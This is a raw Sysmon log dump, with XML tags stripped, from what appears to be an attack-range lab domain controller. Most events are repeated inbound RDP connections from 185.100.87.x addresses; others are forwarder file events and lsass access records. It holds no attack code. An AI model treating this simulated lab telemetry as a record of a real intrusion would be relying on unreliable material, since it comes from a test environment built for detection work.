SERVICEtcpfalsefalse185.100.87.231-38630-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.259{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-51148-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.247{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41992-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.079{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-50836-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.016{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-50704-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.952{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-37858-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.709{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C892978DFAACAFDDBE273252125AB40F,SHA256=0381DE097E12EA4A6BA254E5FF68F0DB00343F4FED45B70D45CAAA817F04991A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BA68A27D14E71A8CEB0EE2591D9CF2A,SHA256=06103EEB01B947A182E6FD116C189521DA85DC589471B9006F1469662505C876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.078{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-45526-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.073{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-54346-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.914{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-54068-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.861{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-53956-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.808{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-41482-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.771{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44966-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.739{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-41332-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.698{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44790-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.677{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.380{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-40642-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.329{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44088-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.273{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-40378-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.189{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-52758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.106{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-43682-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 10341000x800000000000000099682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.240{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.240{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.802{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0806B1C7B7815EA2F533A9988FF109F0,SHA256=9AF67EC55BAC6CA5D9CEA01DD34EECAD217E09A9D120EAD8FA3AD0F7A97BEE68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.016{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-47482-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.897{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-55750-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.735{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-43562-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.256{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-42498-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.896{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F1B65182A227B0D4238BA6AE072A596,SHA256=506E2271B9B0F7DFCB171FBA87564BD1189F6D928A5B9C55D601757E64489F41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.134{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46430-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.030{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57582-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.008{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-49662-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.981{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57506-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.978{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46132-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.943{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-49552-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.932{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57420-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.928{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-49524-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.904{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-45952-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.742{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57130-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.700{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57084-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.675{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-45528-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.609{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-45404-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.602{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-48882-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.595{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-48860-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.540{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-48710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.227{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-47936-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.214{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-44588-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.154{326FD73D-A254-6294-0D00-000000005502}908C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53337-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 354300x800000000000000099707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.154{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53337-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 354300x800000000000000099706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.105{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-44382-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.073{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53336-false10.0.1.12-8000- 354300x800000000000000099704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.051{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-56024-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.065{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48276-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.049{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59198-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.012{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48170-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.005{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51620-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.950{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51514-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.944{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48038-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.921{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51438-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.919{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51432-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.885{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58958-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.881{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47864-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.870{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58942-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.862{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47848-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.836{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58872-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.786{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47684-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.785{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58772-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.758{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58734-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.728{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47568-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.658{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50896-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.604{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50798-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 